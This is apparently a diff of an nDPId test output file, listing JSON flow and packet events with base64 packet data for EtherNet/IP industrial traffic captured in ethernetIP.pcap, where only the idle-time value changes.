-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
-00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
-00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="} -01087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1352718180392,"pkt":"AAC8X0j6eOfR4AJeCABFAAICcEdAAIAGAACNUQAKjVEAK81yrxIurdDtV0tJbVAY+DYczAAAcADCAQAEAhAAAAAAVwG6AAAAAAAAAAAAAAAAAAoAAgChAAQAAi2WALEArgFJUwoCIAIkAR4APgBKAFYAYgBuAHoAhgCSAJ4AqgC2AMIAzgDaAOYA8gD+AAoBFgEiAS4BOgFGAVIBXgFqAXYBggGOAZoBTAIgciQALBwHAAEATAIgciQA0BsGAAEATAIgciQAsBQHAAEATAIgciQA3PMHAAEATAIgciQAnDYFAAEATAIgciQAvAcHAAEATAIgciQAkNEFAAEATAIgciQAAH8HAAEATAIgciQATCMGAAEATAIgciQAOEkGAAEATAIgciQALIcEAAEATAIgciQAALQFAAEATAIgciQAqHwFAAEATAIgciQATJYHAAEATAIgciQAaBgHAAEATAIgciQA3PsGAAEATAIgciQATLwGAAEATAIgciQAGB0IAAEATAIgciQAcFMHAAEATAIgciQAvIMFAAEATAIgciQAvBkGAAEATAIgciQAOJQFAAEATAIgciQATLEFAAEATAIgciQA9HoGAAEATAIgciQApPIGAAEATAIgciQAFIEEAAEATAIgciQA2PAEAAEATAIgciQA+FMGAAEATAIgciQA2PUGAAEATAIgciQApF8HAAEA"} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
-00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"} +02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"thread_ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoA
tgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB0BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="} 
+00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="} 
+01087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1352718180392,"pkt":"AAC8X0j6eOfR4AJeCABFAAICcEdAAIAGAACNUQAKjVEAK81yrxIurdDtV0tJbVAY+DYczAAAcADCAQAEAhAAAAAAVwG6AAAAAAAAAAAAAAAAAAoAAgChAAQAAi2WALEArgFJUwoCIAIkAR4APgBKAFYAYgBuAHoAhgCSAJ4AqgC2AMIAzgDaAOYA8gD+AAoBFgEiAS4BOgFGAVIBXgFqAXYBggGOAZoBTAIgciQALBwHAAEATAIgciQA0BsGAAEATAIgciQAsBQHAAEATAIgciQA3PMHAAEATAIgciQAnDYFAAEATAIgciQAvAcHAAEATAIgciQAkNEFAAEATAIgciQAAH8HAAEATAIgciQATCMGAAEATAIgciQAOEkGAAEATAIgciQALIcEAAEATAIgciQAALQFAAEATAIgciQAqHwFAAEATAIgciQATJYHAAEATAIgciQAaBgHAAEATAIgciQA3PsGAAEATAIgciQATLwGAAEATAIgciQAGB0IAAEATAIgciQAcFMHAAEATAIgciQAvIMFAAEATAIgciQAvBkGAAEATAIgciQAOJQFAAEATAIgciQATLEFAAEATAIgciQA9HoGAAEATAIgciQApPIGAAEATAIgciQAFIEEAAEATAIgciQA2PAEAAEATAIgciQA+FMGAAEATAI